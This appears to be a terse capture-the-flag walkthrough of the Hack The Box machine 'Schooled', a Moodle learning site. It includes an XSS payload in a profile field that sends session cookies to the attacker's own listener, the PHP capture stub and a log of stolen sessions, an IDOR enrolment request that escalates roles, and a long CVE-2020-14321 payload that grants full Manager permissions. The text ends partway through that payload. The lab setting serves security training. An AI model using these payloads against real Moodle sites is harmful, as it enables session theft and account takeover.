Schooled
Sat, 26 October 2024
Platform: Hack The Box
nmapfull 10.10.10.234
Nmap scan report for 10.10.10.234
Host is up (0.029s latency).
Not shown: 64869 closed tcp ports (reset), 663 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
| 2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| 256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_ 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open http Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
|_http-title: Schooled - A new kind of educational institute
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
whatweb 10.10.10.234
http://10.10.10.234 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], Email[#,admissions@schooled.htb], HTML5, HTTPServer[FreeBSD][Apache/2.4.46 (FreeBSD) PHP/7.4.15], IP[10.10.10.234], PHP[7.4.15], Script, Title[Schooled - A new kind of educational institute], X-UA-Compatible[IE=edge]
Email[#,admissions@schooled.htb]
sudo nano /etc/hosts
10.10.10.234 schooled.htb
enumdir http://schooled.htb
200 GET 235l 732w 11066c http://schooled.htb/contact.html
200 GET 4l 194w 8215c http://schooled.htb/js/modernizer.js
200 GET 142l 265w 4552c http://schooled.htb/js/custom.js
200 GET 461l 1555w 20750c http://schooled.htb/index.html
200 GET 357l 1352w 17784c http://schooled.htb/about.html
200 GET 364l 1095w 15997c http://schooled.htb/teachers.html
200 GET 1911l 7282w 57523c http://schooled.htb/js/mapsed.js
200 GET 312l 4320w 321575c http://schooled.htb/js/all.js
200 GET 461l 1555w 20750c http://schooled.htb/
200 GET 26l 53w 437c http://schooled.htb/js/01-custom-places-example.js
301 GET 7l 20w 231c http://schooled.htb/js => http://schooled.htb/js/
200 GET 4l 194w 8215c http://schooled.htb/js/modernizer.js
200 GET 142l 265w 4552c http://schooled.htb/js/custom.js
200 GET 26l 53w 437c http://schooled.htb/js/01-custom-places-example.js
200 GET 235l 732w 11066c http://schooled.htb/contact.html
200 GET 461l 1555w 20750c http://schooled.htb/index.html
200 GET 364l 1095w 15997c http://schooled.htb/teachers.html
200 GET 357l 1352w 17784c http://schooled.htb/about.html
200 GET 1911l 7282w 57523c http://schooled.htb/js/mapsed.js
200 GET 312l 4320w 321575c http://schooled.htb/js/all.js
200 GET 461l 1555w 20750c http://schooled.htb/
enumsub schooled.htb
Found: moodle.schooled.htb Status: 200 [Size: 84]
Found: *.schooled.htb Status: 400 [Size: 347]
Progress: 100000 / 100001 (100.00%)
sudo nano /etc/hosts
10.10.10.234 schooled.htb moodle.schooled.htb
[*] Created test account
test:Imahacker123!
Mathematics
Teacher: Manuel Phillips
Self enrolment (Student)
No enrolment key required.
Scientific Research
Teacher: Jane Higgins
You can not enrol yourself in this course.
Information Technology
Teacher: Jamie Borham
You can not enrol yourself in this course.
English Literature
Teacher: Lianne Carter
You can not enrol yourself in this course.
[*] Enrol on Mathematics course
You are enrolled in the course.
Topic outline
General
Announcements
Forum
Introduction
Calculus
Algebra
Geometry
[*] Announcements
Reminder for joining students
by Manuel Phillips - Wednesday, 23 December 2020, 12:01 AM
Number of replies: 0
This is a self enrollment course. For students who wish to attend my lectures be sure that you have your MoodleNet profile set.
Students who do not set their MoodleNet profiles will be removed from the course before the course is due to start and I will be checking all students who are enrolled on this course.
Look forward to seeing you all soon.
Manuel Phillips
...be sure that you have your MoodleNet profile set
...set their MoodleNet profiles...
[*] User profile settings
First name: test
Surname: test
Email address: test@student.schooled.htb
MoodleNet profile:
City/town: test
Select a country: Angola
Timezone: Server timezone (Europe/London)
Description:
[*] User profile settings edited
First name: test
Surname: test
Email address: test@student.schooled.htb
MoodleNet profile: "><svg/onload=alert(document.cookie)>' OR 1-- {{7*7}}
City/town: test
Select a country: Angola
Timezone: Server timezone (Europe/London)
Description:
[*] Profile page is alerting with XSS cookie
http://moodle.schooled.htb/moodle/user/profile.php?id=28
moodle.schooled.htb says
MoodleSession=0rqhc0u4j8eoac44qt2gnc9k1r
nano index.php
<?php
$cookie = $_SERVER['QUERY_STRING'] ?? '';
?>
MoodleNet profile: "><svg/onload=location='http://10.10.16.7:8000/index.php?'+document.cookie> OR 1-- {{7*7}}
php -S 0.0.0.0:8000
[Thu Oct 24 22:16:44 2024] 10.10.10.234:16960 [200]: GET /index.php?MoodleSession=nj82h9jrmg7kos2sudl6qk8o3j
[Thu Oct 24 22:18:49 2024] 10.10.10.234:30599 [200]: GET /index.php?MoodleSession=dhk0pni6tjs29i0n7rta122aak
[Thu Oct 24 22:20:54 2024] 10.10.10.234:11429 [200]: GET /index.php?MoodleSession=0ttrbpaqb6pq6rq20vsjinb3gj
[Thu Oct 24 22:25:01 2024] 10.10.10.234:44795 [200]: GET /index.php?MoodleSession=kune3ontihp2409q5488983e56
[Thu Oct 24 22:25:01 2024] 10.10.10.234:27622 [200]: GET /index.php?MoodleSession=kune3ontihp2409q5488983e56
[Thu Oct 24 22:27:06 2024] 10.10.10.234:17393 [200]: GET /index.php?MoodleSession=8gufs8rr8dgaog97q9unt14ndm
[Thu Oct 24 22:29:10 2024] 10.10.10.234:31022 [200]: GET /index.php?MoodleSession=chjse86f852glo84avucm4hrbc
[Thu Oct 24 22:33:17 2024] 10.10.10.234:54655 [200]: GET /index.php?MoodleSession=0rlre970c14uen41ohbvkls0ev
[Thu Oct 24 22:33:18 2024] 10.10.10.234:54656 [200]: GET /index.php?MoodleSession=0rlre970c14uen41ohbvkls0ev
[Thu Oct 24 22:35:22 2024] 10.10.10.234:56394 [200]: GET /index.php?MoodleSession=crh8kk433df49ekpq8etfe1b9t
[Thu Oct 24 22:37:27 2024] 10.10.10.234:30260 [200]: GET /index.php?MoodleSession=14o7fb52t0to16s3plsgjncj46
[Thu Oct 24 22:41:34 2024] 10.10.10.234:22592 [200]: GET /index.php?MoodleSession=e27tcmi660baj5jet8sv0ell8f
[Thu Oct 24 22:41:34 2024] 10.10.10.234:64945 [200]: GET /index.php?MoodleSession=e27tcmi660baj5jet8sv0ell8f
[Thu Oct 24 22:43:39 2024] 10.10.10.234:59440 [200]: GET /index.php?MoodleSession=99r1v9ca6gcuu3rkn692dgt1di
[Thu Oct 24 22:45:43 2024] 10.10.10.234:15889 [200]: GET /index.php?MoodleSession=umnqshaorfdup17b0n3cv63rk4
[*] Sessions belong to Manual Phillips
Manuel Phillips
phillips_manuel@staff.schooled.htb
MoodleSession=umnqshaorfdup17b0n3cv63rk4
MoodleSession=14o7fb52t0to16s3plsgjncj46
MoodleSession=crh8kk433df49ekpq8etfe1b9t
MoodleSession=0rlre970c14uen41ohbvkls0ev
MoodleSession=chjse86f852glo84avucm4hrbc
MoodleSession=8gufs8rr8dgaog97q9unt14ndm
[*] Logged in as Manuel Phillips
You are logged in as Manuel Phillips (Log out)
Maths
Data retention summary
[*] Reveals moodle version 3.9
Moodle Docs for this page
https://docs.moodle.org/39/en/Course_homepage
[*] Users --> Enrol users
Enrolment options
Select users: test test test@student.schooled.htb
Assign role: Student
GET /moodle/enrol/manual/ajax.php?mform_showmore_main=0&id=5&action=enrol&enrolid=10&sesskey=BxjPIXJXCS&_qf__enrol_manual_enrol_users_form=1&mform_showmore_id_main=0&userlist%5B%5D=28&roletoassign=5&startdate=4&duration= HTTP/1.1
Host: moodle.schooled.htb
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Referer: http://moodle.schooled.htb/moodle/user/index.php?id=5
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MoodleSession=a9ldo5s7bbtok57h0tsctllm6i
Connection: close
roletoassign=0 ???
roletoassign=1 ???
roletoassign=2 Course creator
roletoassign=3 Teacher
roletoassign=4 Non-editing teacher
roletoassign=5 Student
[*] Lianne Carter is a 'Manager' role
http://moodle.schooled.htb/moodle/user/view.php?id=25&course=5
[*] Enrol Lianne Carter as a student
Enrolment options
Select users: Lianne Carter carter_lianne@staff.schooled.htb
Assign role: Student
GET /moodle/enrol/manual/ajax.php?mform_showmore_main=0&id=5&action=enrol&enrolid=10&sesskey=BxjPIXJXCS&_qf__enrol_manual_enrol_users_form=1&mform_showmore_id_main=0&userlist%5B%5D=25&roletoassign=5&startdate=4&duration= HTTP/1.1
Host: moodle.schooled.htb
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Referer: http://moodle.schooled.htb/moodle/user/index.php?id=5
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MoodleSession=a9ldo5s7bbtok57h0tsctllm6i
Connection: close
*]===============================================================================
Insecure Direct Object Reference (IDOR)
CVSS v3 Score: 9.8 (Critical)
Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
Summary:
- Attack Vector (AV): Network (N)
- Attack Complexity (AC): Low (L)
- Privileges Required (PR): None (N)
- User Interaction (UI): None (N)
- Scope (S): Changed (C)
- Confidentiality Impact (C): High (H)
- Integrity Impact (I): High (H)
- Availability Impact (A): Low (L)
===============================================================================[*]
[*] Manuel Phillips id #24
http://moodle.schooled.htb/moodle/user/profile.php?id=24
[*] Change Manuel Phillips's role to 'Manager'
&userlist%5B%5D=24&roletoassign=1
GET /moodle/enrol/manual/ajax.php?mform_showmore_main=0&id=5&action=enrol&enrolid=10&sesskey=BxjPIXJXCS&_qf__enrol_manual_enrol_users_form=1&mform_showmore_id_main=0&userlist%5B%5D=24&roletoassign=1&startdate=4&duration= HTTP/1.1
Host: moodle.schooled.htb
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Referer: http://moodle.schooled.htb/moodle/user/index.php?id=5
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MoodleSession=a9ldo5s7bbtok57h0tsctllm6i
Connection: close
roletoassign=1 Manager
roletoassign=2 Course creator
roletoassign=3 Teacher
roletoassign=4 Non-editing teacher
roletoassign=5 Student
[*] Profile page now has Administration feature to 'Log in as'
You are logged in as Lianne Carter
[Manuel Phillips] You are logged in as Lianne Carter (Log out)
[*] Site administration tool is now accessible
http://moodle.schooled.htb/moodle/admin/search.php
[*] Manage the existing role using 'Define roles'
http://moodle.schooled.htb/moodle/admin/roles/manage.php
[*] Moodle CVE-2020-14321, Payload to Full Permissions
&return=manage&resettype=none&shortname=manager&name=&description=&archetype=manager&contextlevel10=0&contextlevel10=1&contextlevel30=0
&contextlevel30=1&contextlevel40=0&contextlevel40=1&contextlevel50=0&contextlevel50=1&contextlevel70=0&contextlevel70=1&contextlevel80=0
&contextlevel80=1&allowassign%5B%5D=&allowassign%5B%5D=1&allowassign%5B%5D=2&allowassign%5B%5D=3&allowassign%5B%5D=4&allowassign%5B%5D=5
&allowassign%5B%5D=6&allowassign%5B%5D=7&allowassign%5B%5D=8&allowoverride%5B%5D=&allowoverride%5B%5D=1&allowoverride%5B%5D=2
&allowoverride%5B%5D=3&allowoverride%5B%5D=4&allowoverride%5B%5D=5&allowoverride%5B%5D=6&allowoverride%5B%5D=7&allowoverride%5B%5D=8
&allowswitch%5B%5D=&allowswitch%5B%5D=1&allowswitch%5B%5D=2&allowswitch%5B%5D=3&allowswitch%5B%5D=4&allowswitch%5B%5D=5&allowswitch%5B%5D=6
&allowswitch%5B%5D=7&allowswitch%5B%5D=8&allowview%5B%5D=&allowview%5B%5D=1&allowview%5B%5D=2&allowview%5B%5D=3&allowview%5B%5D=4&allowview%5B%5D=5
&allowview%5B%5D=6&allowview%5B%5D=7&allowview%5B%5D=8&block%2Fadmin_bookmarks%3Amyaddinstance=1&block%2Fbadges%3Amyaddinstance=1
&block%2Fcalendar_month%3Amyaddinstance=1&block%2Fcalendar_upcoming%3Amyaddinstance=1&block%2Fcomments%3Amyaddinstance=1&block%2Fcourse_list%3Amyaddinstance=1
&block%2Fglobalsearch%3Amyaddinstance=1&block%2Fglossary_random%3Amyaddinstance=1&block%2Fhtml%3Amyaddinstance=1&block%2Flp%3Aaddinstance=1
&block%2Flp%3Amyaddinstance=1&block%2Fmentees%3Amyaddinstance=1&block%2Fmnet_hosts%3Amyaddinstance=1&block%2Fmyoverview%3Amyaddinstance=1
&block%2Fmyprofile%3Amyaddinstance=1&block%2Fnavigation%3Amyaddinstance=1&block%2Fnews_items%3Amyaddinstance=1&block%2Fonline_users%3Amyaddinstance=1
&block%2Fprivate_files%3Amyaddinstance=1&block%2Frecentlyaccessedcourses%3Amyaddinstance=1&block%2Frecentlyaccesseditems%3Amyaddinstance=1
&block%2Frss_client%3Amyaddinstance=1&block%2Fsettings%3Amyaddinstance=1&block%2Fstarredcourses%3Amyaddinstance=1&block%2Ftags%3Amyaddinstance=1
&block%2Ftimeline%3Amyaddinstance=1&enrol%2Fcategory%3Asynchronised=1&message%2Fairnotifier%3Amanagedevice=1&moodle%2Fanalytics%3Alistowninsights=1
&moodle%2Fanalytics%3Amanagemodels=1&moodle%2Fbadges%3Amanageglobalsettings=1&moodle%2Fblog%3Acreate=1&moodle%2Fblog%3Amanageentries=1
&moodle%2Fblog%3Amanageexternal=1&moodle%2Fblog%3Asearch=1&moodle%2Fblog%3Aview=1&moodle%2Fblog%3Aviewdrafts=1&moodle%2Fcourse%3Aconfigurecustomfields=1
&moodle%2Fcourse%3Arecommendactivity=1&moodle%2Fgrade%3Amanagesharedforms=1&moodle%2Fgrade%3Asharegradingforms=1&moodle%2Fmy%3Aconfigsyspages=1
&moodle%2Fmy%3Amanageblocks=1&moodle%2Fportfolio%3Aexport=1&moodle%2Fquestion%3Aconfig=1&moodle%2Frestore%3Acreateuser=1&moodle%2Frole%3Amanage=1
&moodle%2Fsearch%3Aquery=1&moodle%2Fsite%3Aconfig=1&moodle%2Fsite%3Aconfigview=1&moodle%2Fsite%3Adeleteanymessage=1&moodle%2Fsite%3Adeleteownmessage=1
&moodle%2Fsite%3Adoclinks=1&moodle%2Fsite%3Aforcelanguage=1&moodle%2Fsite%3Amaintenanceaccess=1&moodle%2Fsite%3Amanageallmessaging=1
&moodle%2Fsite%3Amessageanyuser=1&moodle%2Fsite%3Amnetlogintoremote=1&moodle%2Fsite%3Areadallmessages=1&moodle%2Fsite%3Asendmessage=1
&moodle%2Fsite%3Auploadusers=1&moodle%2Fsite%3Aviewparticipants=1&moodle%2Ftag%3Aedit=1&moodle%2Ftag%3Aeditblocks=1&moodle%2Ftag%3Aflag=1
&moodle%2Ftag%3Amanage=1&moodle%2Fuser%3Achangeownpassword=1&moodle%2Fuser%3Acreate=1&moodle%2Fuser%3Adelete=1&moodle%2Fuser%3Aeditownmessageprofile=1
&moodle%2Fuser%3Aeditownprofile=1&moodle%2Fuser%3Aignoreuserquota=1&moodle%2Fuser%3Amanageownblocks=1&moodle%2Fuser%3Amanageownfiles=1
&moodle%2Fuser%3Amanagesyspages=1&moodle%2Fuser%3Aupdate=1&moodle%2Fwebservice%3Acreatemobiletoken=1&moodle%2Fwebservice%3Acreatetoken=1
&moodle%2Fwebservice%3Amanagealltokens=1&quizaccess%2Fseb%3Amanagetemplates=1&report%2Fcourseoverview%3Aview=1&report%2Fperformance%3Aview=1
&report%2Fquestioninstances%3Aview=1&report%2Fsecurity%3Aview=1&report%2Fstatus%3Aview=1&tool%2Fcustomlang%3Aedit=1&tool%2Fcustomlang%3Aview=1
&tool%2Fdataprivacy%3Amanagedataregistry=1&tool%2Fdataprivacy%3Amanagedatarequests=1&tool%2Fdataprivacy%3Arequestdeleteforotheruser=1
&tool%2Flpmigrate%3Aframeworksmigrate=1&tool%2Fmonitor%3Amanagetool=1&tool%2Fpolicy%3Aaccept=1&tool%2Fpolicy%3Amanagedocs=1&tool%2Fpolicy%3Aviewacceptances=1
&tool%2Fuploaduser%3Auploaduserpictures=1&tool%2Fusertours%3Amanagetours=1&auth%2Foauth2%3Amanagelinkedlogins=1&moodle%2Fbadges%3Amanageownbadges=1
&moodle%2Fbadges%3Aviewotherbadges=1&moodle%2Fcompetency%3Aevidencedelete=1&moodle%2Fcompetency%3Aplancomment=1&moodle%2Fcompetency%3Aplancommentown=1
&moodle%2Fcompetency%3Aplanmanage=1&moodle%2Fcompetency%3Aplanmanagedraft=1&moodle%2Fcompetency%3Aplanmanageown=1&moodle%2Fcompetency%3Aplanmanageowndraft=1
&moodle%2Fcompetency%3Aplanrequestreview=1&moodle%2Fcompetency%3Aplanrequestreviewown=1&moodle%2Fcompetency%3Aplanreview=1&moodle%2Fcompetency%3Aplanview=1
&moodle%2Fcompetency%3Aplanviewdraft=1&moodle%2Fcompetency%3Aplanviewown=1&moodle%2Fcompetency%3Aplanviewowndraft=1&moodle%2Fcompetency%3Ausercompetencycomment=1
&moodle%2Fcompetency%3Ausercompetencycommentown=1&moodle%2Fcompetency%3Ausercompetencyrequestreview=1&moodle%2Fcompetency%3Ausercompetencyrequestreviewown=1
&moodle%2Fcompetency%3Ausercompetencyreview=1&moodle%2Fcompetency%3Ausercompetencyview=1&moodle%2Fcompetency%3Auserevidencemanage=1
&moodle%2Fcompetency%3Auserevidencemanageown=0&moodle%2Fcompetency%3Auserevidenceview=1&moodle%2Fuser%3Aeditmessageprofile=1&moodle%2Fuser%3Aeditprofile=1
&moodle%2Fuser%3Amanageblocks=1&moodle%2Fuser%3Areaduserblogs=1&moodle%2Fuser%3Areaduserposts=1&moodle%2Fuser%3Aviewalldetails=1
&moodle%2Fuser%3Aviewlastip=1&moodle%2Fuser%3Aviewuseractivitiesreport=1&report%2Fusersessions%3Amanageownsessions=1&tool%2Fdataprivacy%3Adownloadallrequests=1
&tool%2Fdataprivacy%3Adownloadownrequest=1&tool%2Fdataprivacy%3Amakedatadeletionrequestsforchildren=1&tool%2Fdataprivacy%3Amakedatarequestsforchildren=1
&tool%2Fdataprivacy%3Arequestdelete=1&tool%2Fpolicy%3Aacceptbehalf=1&moodle%2Fcategory%3Amanage=1&moodle%2Fcategory%3Aviewcourselist=1
&moodle%2Fcategory%3Aviewhiddencategories=1&moodle%2Fcohort%3Aassign=1&moodle%2Fcohort%3Amanage=1&moodle%2Fcompetency%3Acompetencymanage=1
&moodle%2Fcompetency%3Acompetencyview=1&moodle%2Fcompetency%3Atemplatemanage=1&moodle%2Fcompetency%3Atemplateview=1&moodle%2Fcourse%3Acreate=1
&moodle%2Fcourse%3Arequest=1&moodle%2Fsite%3Aapprovecourse=1&repository%2Fcontentbank%3Aaccesscoursecategorycontent=1&repository%2Fcontentbank%3Aaccessgeneralcontent=1
&block%2Frecent_activity%3Aviewaddupdatemodule=1&block%2Frecent_activity%3Aviewdeletemodule=1&contenttype%2Fh5p%3Aaccess=1&contenttype%2Fh5p%3Aupload=1
&contenttype%2Fh5p%3Auseeditor=1&enrol%2Fcategory%3Aconfig=1&enrol%2Fcohort%3Aconfig=1&enrol%2Fcohort%3Aunenrol=1&enrol%2Fdatabase%3Aconfig=1
&enrol%2Fdatabase%3Aunenrol=1&enrol%2Fflatfile%3Amanage=1&enrol%2Fflatfile%3Aunenrol=1&enrol%2Fguest%3Aconfig=1&enrol%2Fimsenterprise%3Aconfig=1
&enrol%2Fldap%3Amanage=1&enrol%2Flti%3Aconfig=1&enrol%2Flti%3Aunenrol=1&enrol%2Fmanual%3Aconfig=1&enrol%2Fmanual%3Aenrol=1&enrol%2Fmanual%3Amanage=1
&enrol%2Fmanual%3Aunenrol=1&enrol%2Fmanual%3Aunenrolself=1&enrol%2Fmeta%3Aconfig=1&enrol%2Fmeta%3Aselectaslinked=1&enrol%2Fmeta%3Aunenrol=1
&enrol%2Fmnet%3Aconfig=1&enrol%2Fpaypal%3Aconfig=1&enrol%2Fpaypal%3Amanage=1&enrol%2Fpaypal%3Aunenrol=1&enrol%2Fpaypal%3Aunenrolself=1
&enrol%2Fself%3Aconfig=1&enrol%2Fself%3Aholdkey=1&enrol%2Fself%3Amanage=1&enrol%2Fself%3Aunenrol=1&enrol%2Fself%3Aunenrolself=1&gradeexport%2Fods%3Apublish=1
&gradeexport%2Fods%3Aview=1&gradeexport%2Ftxt%3Apublish=1&gradeexport%2Ftxt%3Aview=1&gradeexport%2Fxls%3Apublish=1&gradeexport%2Fxls%3Aview=1
&gradeexport%2Fxml%3Apublish=1&gradeexport%2Fxml%3Aview=1&gradeimport%2Fcsv%3Aview=1&gradeimport%2Fdirect%3Aview=1&gradeimport%2Fxml%3Apublish=1
&gradeimport%2Fxml%3Aview=1&gradereport%2Fgrader%3Aview=1&gradereport%2Fhistory%3Aview=1&gradereport%2Foutcomes%3Aview=1&gradereport%2Foverview%3Aview=1
&gradereport%2Fsingleview%3Aview=1&gradereport%2Fuser%3Aview=1&mod%2Fassign%3Aaddinstance=1&mod%2Fassignment%3Aaddinstance=1&mod%2Fbook%3Aaddinstance=1
&mod%2Fchat%3Aaddinstance=1&mod%2Fchoice%3Aaddinstance=1&mod%2Fdata%3Aaddinstance=1&mod%2Ffeedback%3Aaddinstance=1&mod%2Ffolder%3Aaddinstance=1
&mod%2Fforum%3Aaddinstance=1&mod%2Fglossary%3Aaddinstance=1&mod%2Fh5pactivity%3Aaddinstance=1&mod%2Fimscp%3Aaddinstance=1&mod%2Flabel%3Aaddinstance=1
&mod%2Flesson%3Aaddinstance=1&mod%2Flti%3Aaddcoursetool=1&mod%2Flti%3Aaddinstance=1&mod%2Flti%3Aaddmanualinstance=1&mod%2Flti%3Aaddpreconfiguredinstance=1
&mod%2Flti%3Arequesttooladd=1&mod%2Fpage%3Aaddinstance=1&mod%2Fquiz%3Aaddinstance=1&mod%2Fresource%3Aaddinstance=1&mod%2Fscorm%3Aaddinstance=1
&mod%2Fsurvey%3Aaddinstance=1&mod%2Furl%3Aaddinstance=1&mod%2Fwiki%3Aaddinstance=1&mod%2Fworkshop%3Aaddinstance=1&moodle%2Fanalytics%3Alistinsights=1
&moodle%2Fbackup%3Aanonymise=1&moodle%2Fbackup%3Abackupcourse=1&moodle%2Fbackup%3Abackupsection=1&moodle%2Fbackup%3Abackuptargetimport=1
&moodle%2Fbackup%3Aconfigure=1&moodle%2Fbackup%3Adownloadfile=1&moodle%2Fbackup%3Auserinfo=1&moodle%2Fbadges%3Aawardbadge=1&moodle%2Fbadges%3Aconfigurecriteria=1
&moodle%2Fbadges%3Aconfiguredetails=1&moodle%2Fbadges%3Aconfiguremessages=1&moodle%2Fbadges%3Acreatebadge=1&moodle%2Fbadges%3Adeletebadge=1
&moodle%2Fbadges%3Aearnbadge=1&moodle%2Fbadges%3Arevokebadge=1&moodle%2Fbadges%3Aviewawarded=1&moodle%2Fbadges%3Aviewbadges=1&moodle%2Fcalendar%3Amanageentries=1
&moodle%2Fcalendar%3Amanagegroupentries=1&moodle%2Fcalendar%3Amanageownentries=1&moodle%2Fcohort%3Aview=1&moodle%2Fcomment%3Adelete=1&moodle%2Fcomment%3Apost=1
&moodle%2Fcomment%3Aview=1&moodle%2Fcompetency%3Acompetencygrade=1&moodle%2Fcompetency%3Acoursecompetencygradable=1&moodle%2Fcompetency%3Acoursecompetencymanage=1
&moodle%2Fcompetency%3Acoursecompetencyview=1&moodle%2Fcontentbank%3Aaccess=1&moodle%2Fcontentbank%3Adeleteanycontent=1&moodle%2Fcontentbank%3Adeleteowncontent=1
&moodle%2Fcontentbank%3Amanageanycontent=1&moodle%2Fcontentbank%3Amanageowncontent=1&moodle%2Fcontentbank%3Aupload=1&moodle%2Fcontentbank%3Auseeditor=1
&moodle%2Fcourse%3Abulkmessaging=1&moodle%2Fcourse%3Achangecategory=1&moodle%2Fcourse%3Achangefullname=1&moodle%2Fcourse%3Achangeidnumber=1
&moodle%2Fcourse%3Achangelockedcustomfields=1&moodle%2Fcourse%3Achangeshortname=1&moodle%2Fcourse%3Achangesummary=1&moodle%2Fcourse%3Acreategroupconversations=1
&moodle%2Fcourse%3Adelete=1&moodle%2Fcourse%3Aenrolconfig=1&moodle%2Fcourse%3Aenrolreview=1&moodle%2Fcourse%3Aignorefilesizelimits=1
&moodle%2Fcourse%3Aisincompletionreports=1&moodle%2Fcourse%3Amanagefiles=1&moodle%2Fcourse%3Amanagegroups=1&moodle%2Fcourse%3Amanagescales=1
&moodle%2Fcourse%3Amarkcomplete=1&moodle%2Fcourse%3Amovesections=1&moodle%2Fcourse%3Aoverridecompletion=1&moodle%2Fcourse%3Arenameroles=1
&moodle%2Fcourse%3Areset=1&moodle%2Fcourse%3Areviewotherusers=1&moodle%2Fcourse%3Asectionvisibility=1&moodle%2Fcourse%3Asetcurrentsection=1
&moodle%2Fcourse%3Asetforcedlanguage=1&moodle%2Fcourse%3Atag=1&moodle%2Fcourse%3Aupdate=1&moodle%2Fcourse%3Auseremail=1&moodle%2Fcourse%3Aview=1
&moodle%2Fcourse%3Aviewhiddencourses=1&moodle%2Fcourse%3Aviewhiddensections=1&moodle%2Fcourse%3Aviewhiddenuserfields=1&moodle%2Fcourse%3Aviewparticipants=1
&moodle%2Fcourse%3Aviewscales=1&moodle%2Fcourse%3Aviewsuspendedusers=1&moodle%2Fcourse%3Avisibility=1&moodle%2Ffilter%3Amanage=1&moodle%2Fgrade%3Aedit=1
&moodle%2Fgrade%3Aexport=1&moodle%2Fgrade%3Ahide=1&moodle%2Fgrade%3Aimport=1&moodle%2Fgrade%3Alock=1&moodle%2Fgrade%3Amanage=1&moodle%2Fgrade%3Amanagegradingforms=1
&moodle%2Fgrade%3Amanageletters=1&moodle%2Fgrade%3Amanageoutcomes=1&moodle%2Fgrade%3Aunlock=1&moodle%2Fgrade%3Aview=1&moodle%2Fgrade%3Aviewall=1
&moodle%2Fgrade%3Aviewhidden=1&moodle%2Fnotes%3Amanage=1&moodle%2Fnotes%3Aview=1&moodle%2Fquestion%3Aadd=1&moodle%2Fquestion%3Aeditall=1
&moodle%2Fquestion%3Aeditmine=1&moodle%2Fquestion%3Aflag=1&moodle%2Fquestion%3Amanagecategory=1&moodle%2Fquestion%3Amoveall=1&moodle%2Fquestion%3Amovemine=1
&moodle%2Fquestion%3Atagall=1&moodle%2Fquestion%3Atagmine=1&moodle%2Fquestion%3Auseall=1&moodle%2Fquestion%3Ausemine=1&moodle%2Fquestion%3Aviewall=1
&moodle%2Fquestion%3Aviewmine=1&moodle%2Frating%3Arate=1&moodle%2Frating%3Aview=1&moodle%2Frating%3Aviewall=1&moodle%2Frating%3Aviewany=1
&moodle%2Frestore%3Aconfigure=1&moodle%2Frestore%3Arestoreactivity=1&moodle%2Frestore%3Arestorecourse=1&moodle%2Frestore%3Arestoresection=1
&moodle%2Frestore%3Arestoretargetimport=1&moodle%2Frestore%3Arolldates=1&moodle%2Frestore%3Auploadfile=1&moodle%2Frestore%3Auserinfo=1
&moodle%2Frestore%3Aviewautomatedfilearea=1&moodle%2Frole%3Aassign=1&moodle%2Frole%3Aoverride=1&moodle%2Frole%3Areview=1&moodle%2Frole%3Asafeoverride=1
&moodle%2Frole%3Aswitchroles=1&moodle%2Fsite%3Aviewreports=1&moodle%2Fuser%3Aloginas=1&moodle%2Fuser%3Aviewdetails=1&moodle%2Fuser%3Aviewhiddendetails=1
&report%2Fcompletion%3Aview=1&report%2Flog%3Aview=1&report%2Flog%3Aviewtoday=1&report%2Floglive%3Aview=1&report%2Foutline%3Aview=1
&report%2Foutline%3Aviewuserreport=1&report%2Fparticipation%3Aview=1&report%2Fprogress%3Aview=1&report%2Fstats%3Aview=1&repository%2Fcontentbank%3Aaccesscoursecontent=1
&tool%2Fmonitor%3Amanagerules=1&tool%2Fmonitor%3Asubscribe=1&tool%2Frecyclebin%3Adeleteitems=1&tool%2Frecyclebin%3Arestoreitems=1&tool%2Frecyclebin%3Aviewitems=1
&webservice%2Frest%3Ause=1&webservice%2Fsoap%3Ause=1&webservice%2Fxmlrpc%3Ause=1&atto%2Fh5p%3Aaddembed=1&atto%2Frecordrtc%3Arecordaudio=1
&atto%2Frecordrtc%3Arecordvideo=1&booktool%2Fexportimscp%3Aexport=1&booktool%2Fimporthtml%3Aimport=1&booktool%2Fprint%3Aprint=1&forumreport%2Fsummary%3Aview=1
&forumreport%2Fsummary%3Aviewall=1&mod%2Fassign%3Aeditothersubmission=1&mod%2Fassign%3Aexportownsubmission=1&mod%2Fassign%3Agrade=1&mod%2Fassign%3Agrantextension=1
&mod%2Fassign%3Amanageallocations=1&mod%2Fassign%3Amanagegrades=1&mod%2Fassign%3Amanageoverrides=1&mod%2Fassign%3Areceivegradernotifications=1
&mod%2Fassign%3Areleasegrades=1&mod%2Fassign%3Arevealidentities=1&mod%2Fassign%3Areviewgrades=1&mod%2Fassign%3Ashowhiddengrader=1&mod%2Fassign%3Asubmit=1
&mod%2Fassign%3Aview=1&mod%2Fassign%3Aviewblinddetails=1&mod%2Fassign%3Aviewgrades=1&mod%2Fassignment%3Aexportownsubmission=1&mod%2Fassignment%3Agrade=1
